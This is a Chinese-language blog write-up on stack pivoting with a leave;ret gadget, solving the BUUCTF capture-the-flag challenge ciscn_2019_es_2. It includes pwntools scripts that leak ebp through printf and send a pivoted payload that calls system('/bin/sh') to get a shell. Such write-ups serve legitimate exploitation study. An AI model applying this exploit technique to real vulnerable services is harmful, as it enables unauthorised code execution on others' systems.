pwn学习-栈迁移

栈迁移:简单理解就是在栈溢出的时候可溢出的字符过少,只能溢出ebpret的地址,可以使用leave_ret这个gadget来实现栈的迁移。
在栈中,默认情况下汇编语言在栈结束的时候都默认会执行一次leaveret指令,我们利用这个特性将返回地址修改为leave_retgadget,将会执行两次leaveret的操作,将我们的栈迁移到ebp溢出指定的位置,执行想要执行的指令。

题目示例:

BUUCTF ciscn_2019_es_2

使用ida打开分析

main函数中调用了vul函数,该函数中read函数存在栈溢出,但是只能溢出8个字节,通过函数列表发现拥有一个hack函数调用了system,现在我们拥有了system的addr,但是溢出的空间并不能让我们手动的构造gadget获取shell

通过观察发现,该vul函数使用了printf输出s的内容,我们知道printf在输出字符串的时候遇到\x00才会结束,所以我们可以通过溢出,获取ebp的地址,在汇编的学习中,我们知道在栈中取值一般通过ebp - offset,所以我们的思路如下:

  1. 通过溢出在s的栈中没有\x00,让printf输出ebp的地址
  2. 通过溢出在s的栈中写入'aaaa' + system_addr + system_return + bin_sh_addr + '/bin/sh' + 垃圾字符 + s栈开始 + leave_ret

让我们站在程序的思路看一下发生了什么:

  1. 栈结束的时候,执行leaveret,这时会跳转到ebp保存的地址,也就是s栈开始
  2. 接着执行leave_ret我们在return_addr加入的gadget地址,这时会将栈迁移到s栈开始的位置,esp会指向栈的s栈开始 +4个字节,因为leave_ret相当于执行了mov esp,ebppop ebp,pop ebp的时候,在pop的时候,会将esp的值+4,所以我们需要在开头写入四个字节的aaaa
  3. 接着执行leave_ret中的ret指令,相当于pop eip,这时会将system_addr的地址读取到eipeip就是程序执行到哪里了,就会接着执行system函数
  4. system函数需要执行返回地址和参数,返回地址随便,参数为/bin/sh,由于程序中没有/bin/sh,我们执行程序的地址为s栈的开始 + 0x10,因为我们前面的'aaaa' + system_addr + system_return + bin_sh_addr相当于四条汇编指令,占用16个字节,接着往栈里写入/bin/sh,就可以成功执行system(/bin/sh),完美

理论成立,接着实践,如何获取s栈开始的地址呢?,ebp可以通过printf输出获取,如果使用ebp - offset来获取s栈开始的位置是一个问题,首先先使用脚本尝试printf溢出,获取ebp的地址

from pwn import *
context(log_level='debug')

p = process("./ciscn_2019_es_2")
# p = remote("node5.buuoj.cn",28942)
e = ELF("./ciscn_2019_es_2")

leave_ret = 0x08048562
system = e.sym['system']
p.recvuntil("Welcome, my friend. What's your name?")

payload1 = b"A" * 0x20 + b"B" * 0x8
p.send(payload1)


p.recvuntil(b"BBBBBBBB")
ebp = u32(p.recv(4))
log.success("ebp_addr: " + str(hex(ebp)))

p.interactive()

接着使用pwndbg调试查看ebp到栈顶的偏移

printf时发现栈顶到栈底的偏移为0x34,这里我们需要改为0x34 + 4,因为printf的参数'Hello, %s\n'也占用了四个字节

接着我们构造脚本,如下:

from pwn import *
context(log_level='debug')

p = process("./ciscn_2019_es_2")
# p = remote("node5.buuoj.cn",28942)
e = ELF("./ciscn_2019_es_2")

leave_ret = 0x08048562
system = e.sym['system']
p.recvuntil("Welcome, my friend. What's your name?")

payload1 = b"A" * 0x20 + b"B" * 0x8
p.send(payload1)


p.recvuntil(b"BBBBBBBB")
ebp = u32(p.recv(4))
log.success("ebp_addr: " + str(hex(ebp)))


payload2 = b"AAAA" + p32(system) + p32(0) + p32(ebp - 0x38 + 0x10) + b"/bin/sh"
payload2 = payload2.ljust(0x28,b"\x00") + p32(ebp - 0x38) + p32(leave_ret)
p.send(payload2)

p.interactive()

运行的到shell

posted @ 2024-06-13 18:23  Junglezt  阅读(4)  评论(0编辑  收藏  举报